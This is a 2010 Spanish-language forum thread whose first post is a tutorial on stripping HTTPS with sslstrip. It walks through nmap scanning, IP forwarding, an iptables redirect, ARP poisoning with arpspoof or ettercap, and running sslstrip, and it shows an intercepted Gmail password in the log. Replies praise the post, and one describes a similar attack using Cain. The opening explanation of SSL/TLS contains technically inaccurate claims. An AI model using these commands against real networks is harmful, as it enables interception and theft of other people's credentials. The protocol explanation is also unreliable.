• General

  • Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
Esta sección englobará diversas técnicas y campos de la seguridad informática moderna.
 #157810  por FroZenFeW
 15 Mar 2010, 03:10
antes de entender que es sslstrip debes saber primero
¿que es SSL y TSL?

SSL significa Secure Sockets Layer, aunque IETF (Internet Engineering Task Force) le cambió el nombre a TLS (Transport Layer Security). Los términos SSL y TLS son a menudo utilizados indistintamente o en combinación (TLS / SSL), pero uno es de hecho, el predecesor del otro - SSL 3.0, sirvio de base para TLS 1.0, que,aveces se identifica como protocolo SSL 3.1.

Porque es usado SSL/TSL?
la criptografía es la base para los protocolos de seguridad más modernas. Cuando se establece una sesión SSL, el servidor se inicia mediante el envío de una clave pública encriptada para el cliente, por lo que ambas partes (y de cualquier espía) puede leer esta clave. Sin embargo, el cliente transmite un randomn 46 bytes (basado en PKCS) de los datos al servidor de una manera que nadie más podía descifrar. Sólo el servidor, con su clave privada, puede decodificar la información para determinar los 46 bytes originales. Este secreto compartido se utiliza ahora para generar un conjunto de claves de cifrado (basado en RC4 o ARC4) para cifrar el resto de la sesión.
Estas claves fueron incorporadas en los certificados de autenticación (los denominados certificados X.509) que permitie a un servidor autenticar a un cliente,
Imagen

nos preguntaremos.. bueno y esto a que viene si queremos saber es de sslstrip??
bueno yo tambien me pregunto lo mismo xD pero es algo vital si queremos usar esta herramienta correctamente.
SSLStrip creada por Moxie Marlinspike presentada en Black Hat DC 2009.
sslstrip es un script creado en python que permite realizar ataques MiTM (Man-in-The-Middle) convirtiendo todas las comunicaciones entre cliente y la herramienta sslstrip en comunicaciones sin SSL. Las funciones principales de la herramienta serían:
1. Hacer MiTM en las conexiones HTTP.
2. Reemplazar todos los enlaces HTTPS por enlaces HTTP.
3. Comunicarse con el cliente siempre por HTTP, incluso para las conexiones seguras.
4. Comunicarse con el servidor por HTTPS, para los mismos links seguros que hablamos antes.
5. Hacer transparente la comunicación tanto para el cliente como para el servidor.
6. Reemplazar imágenes como el favicon por imagenes que aporten confianza en la conexión al cliente.
7. Obtención de información sensible.

y que se necesita para hacer un MiTM con sslstrip?

vamos a atacar mi "red" local
necesitaremos identificar nuestra "victima"
sabiendo que nuestra ip es 192.168.0.100
y nuestra puerta de enlace es 192.168.0.1
utilizaremos nmap para saber que ip estan conectadas

escanearemos nuestra red
Imagen

vemos nuestra ip y la ip de nuestra victima 192.168.0.102

vamos ahora hacer que nuestro equipo funcione como una puerta de enlace en nuestra red

abrimos una consola y escribimos
echo 1> /proc/sys/net/ipv4/ip_forward
lo que significa subir ip_forward, 0 es para bajar ip_forward por lo general esta como default
Imagen

Redirigiremos todo el tráfico HTTP con iptables al puerto 8080 para que pase por sslstrip, tambien puede usar cualquier puerto, sslstrip usa el puerto 10000 como default
iptables -t nat -A PREROUTING -p tcp --destination-p 80 -j REDIRECT --to-p 8080
Imagen

ahora pasamos a realizar el ataque ARP MiTM no explicare de a mucho que es un arp MiTM pero para resumir el ataque se basa en decirle a victima que la mac addres de mi equipo es el gateway // que resumen xD
podemos usar dos formas una es con arpspoof que seria de la siguiente forma
arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}
Imagen

o usando ettercap que es mi favorita
ettercap -i {interface_red} -T -q -M arp /{gateway}/ // // -P autoadd
Imagen

ahora ejecutamos sslstrip
sslstrip -w nombre -a -l 8080 //el nombre es opcional
Imagen

los datos se guardaran en sslstrip.log

si vemos del lado de la victima entramos a gmail y vemos que no entramos a travez de un protocolo seguro
Imagen

si vemos en el log buscamos un acceso a gmail veamos que encontramos
Imagen
vemos que esta enviando por ssl nuestro acceso a gmail Email=frozenfew&Passwd=laclavees12345
ahora todo el trafico paso por sslstrip de esta forma
Cliente <---NoSSL----> SSLStrip <--SSL---> Servidor

bueno hasta aqui espero que les guste

saludos

pd: me gustaria hacerles un videito aunque ya lo hize pero pues tengo la conexion mas rapida del mundo ¬¬ y pues se conecta y se desconecta cada 7 segundos // comprobado // si puedo donde un amigo lo subire

dedicado a an0 xD
 #157816  por masangel
 15 Mar 2010, 03:28
Se ve exelente Frozn
Saludos
 #157847  por DSR!
 15 Mar 2010, 07:18
sos un grande, eso es lo que queremos (L)
 #157855  por 4n0nym0us
 15 Mar 2010, 08:38
dale caña hermano!! ahora me lo imprimo y lo leo que tiene buena pinta

Edito/

La ostia el método no lo conocía! Estos ataques MITM los solía hacer pero con Caín e instalación de certificados usando también envenenamiento ARP para el cambio con el Gateway.

Muy cuco!!

Redito/

Yo jugué con la compatibilidad "Linux&Windows" para snifar de forma cómoda... el Pc que sufre la prueba es el 213 y el Gateway la 217.


Se ve en la imagen que haciendo un tracert llega antes a esta IP que al auténtico router.
Imagen


Con Caín aprobechando que el envenenamiento ARP está hecho solo queda escucharlo.
Imagen
 #157922  por p0is0n-123
 15 Mar 2010, 13:59
No me entero ni de la mitad,pero aprendere y me encantan estas cosas...
Gracias FzF

Salu2
 #157957  por FroZenFeW
 15 Mar 2010, 15:51
oh no me acordaba de cain y abel hace mucho que no lo uso xD

veo que les gusto

saludos
 #157971  por K-0Z
 15 Mar 2010, 16:19
FroZenFeW escribió:oh no me acordaba de cain y abel hace mucho que no lo uso xD

veo que les gusto

saludos
claro que nos gusto , cain y abel.... recuerdo haberlo usado hace tiempo , salu2
 #158008  por linkgl
 15 Mar 2010, 17:34
Que buen tema, ignoro mucho de lo que explicas ahí, tendre que leermelo despacito xD
 #158283  por _Dei_Rockito_
 16 Mar 2010, 10:48
linkgl escribió:Que buen tema, ignoro mucho de lo que explicas ahí, tendre que leermelo despacito xD
Yo tambien, me tendre que poner al corriente

 #159120  por G33KFER
 18 Mar 2010, 17:44
FroZenFeW siempre sorprendiendome ..
esto es algo que no sabia..
gracias FroZen
 #159842  por Xpro
 20 Mar 2010, 15:33
Bastante interesante, si señor.
 #159888  por uxisar
 20 Mar 2010, 18:33
jaja , me lo reelere muchas veces xD pero estoy seguro que es util , segurisimo !
saludos !
 #159904  por osx
 20 Mar 2010, 19:22
Buen aporte FroZenFeW!

saludos!
 #161028  por tripx
 23 Mar 2010, 17:00
Porque es usado SSL/TSL?
la criptografía es la base para los protocolos de seguridad más modernas. Cuando se establece una sesión SSL, el servidor se inicia mediante el envío de una clave pública encriptada para el cliente, por lo que ambas partes (y de cualquier espía) puede leer esta clave. Sin embargo, el cliente transmite un randomn 46 bytes (basado en PKCS) de los datos al servidor de una manera que nadie más podía descifrar. Sólo el servidor, con su clave privada, puede decodificar la información para determinar los 46 bytes originales. Este secreto compartido se utiliza ahora para generar un conjunto de claves de cifrado (basado en RC4 o ARC4) para cifrar el resto de la sesión.
Estas claves fueron incorporadas en los certificados de autenticación (los denominados certificados X.509) que permitie a un servidor autenticar a un cliente,
Podra ser que se pueda usar para snifear CTS para que el CLR las acepte=?

Por ejemplo, un valor entero de 4 bytes se representa por tipo CTS System.Int32. C# entonces define para el un alias lamado int. que es un valor de 32-bits con signo.

Otro Ejemplo:

CTS: System.Decimal Alias C#: decimal

Que en si son tipos de datos de 128-bit que sera como a un monton de informacion.

SE me esta ocurriendo una idea...xD!!!!
 #161390  por RoLyxRoLy
 24 Mar 2010, 13:46
que bueno información... ya la guarde :D